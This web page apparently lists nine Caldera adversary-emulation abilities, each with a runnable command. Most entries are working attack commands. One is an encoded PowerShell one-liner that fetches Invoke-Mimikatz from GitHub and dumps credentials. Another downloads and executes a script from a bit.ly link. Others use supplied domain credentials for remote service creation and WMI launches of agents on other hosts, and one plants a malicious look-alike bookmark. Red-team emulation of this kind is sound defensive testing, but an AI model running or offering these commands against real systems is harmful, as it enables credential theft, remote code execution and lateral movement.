Home/Caldera abilities

Caldera emulation abilities

9 runnable adversary-emulation actions · command + platform · mapped to ATT&CK

Abilities

9 shown of 9
Add bookmark
Add a malicous bookmark which looks like a current one
Show command
[{"platform": "darwin", "executor": "sh", "command": "osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}\n"}]
Emulate Administrator Tasks
Emulate administrator tasks on a system in a separate process
Show command
[{"platform": "windows", "executor": "psh,pwsh", "command": "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\\Emulate-Administrator-Tasks.ps1\"\n"}]
Impersonate user
Run an application as a different user
Show command
[{"platform": "windows", "executor": "psh", "command": "$job = Start-Job -ScriptBlock {\n  $username = '#{host.user.name}';\n  $password = '#{host.user.password}';\n  $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;\n  $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;\n  Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;\n};\nReceive-Job -Job $job -Wait;\n"}]
PowerShell Invoke MimiKats
Download
Show command
[{"platform": "windows", "executor": "psh", "command": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==\n"}]
PowerShell bitly Link Download
Download
Show command
[{"platform": "windows", "executor": "psh", "command": "powershell.exe -c IEX (New-Object Net.Webclient).downloadstring(\"https://bit.ly/33H0QXi\") \n"}]
Service Creation
Create a service named "sandsvc" to execute remote 54ndc57 binary named "s4ndc4t.exe"
Show command
[{"platform": "windows", "executor": "psh", "command": "sc.exe \\\\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= \"cmd /c start C:\\Users\\Public\\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}\" displayname= \"Sandcat Execution\";\nsc.exe \\\\#{remote.host.fqdn} start sandsvc;\nStart-Sleep -s 15;\nGet-Process -ComputerName #{remote.host.fqdn} s4ndc4t;\n"}]
Start 54ndc47
Start a new 54ndc47 agent in background
Show command
[{"platform": "darwin", "executor": "sh", "command": "nohup ./sandcat.go -server #{server} &\n"}, {"platform": "linux", "executor": "sh", "command": "nohup ./sandcat.go -server #{server} &\n"}]
Start 54ndc47 (WMI)
Remotely executes 54ndc47 over WMI
Show command
[{"platform": "windows", "executor": "psh", "command": "$node = '''#{remote.host.fqdn}''';\n$user = '''#{domain.user.name}''';\n$password = '''#{domain.user.password}''';\nwmic /node:$node /user:$user /password:$password process call create \"powershell.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n"}, {"platform": "windows", "executor": "cmd", "command": "$node = '''#{remote.host.fqdn}''';\n$user = '''#{domain.user.name}''';\n$password = '''#{domain.user.password}''';\nwmic /node:$node /user:$user /password:$password process call create \"cmd.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n"}]
Stop PowerShell processes
Kill all PowerShell processes
Show command
[{"platform": "windows", "executor": "pwsh", "command": "Get-Process -Name \"powershell\" | Stop-Process\n"}]
Showing 1-9 of 9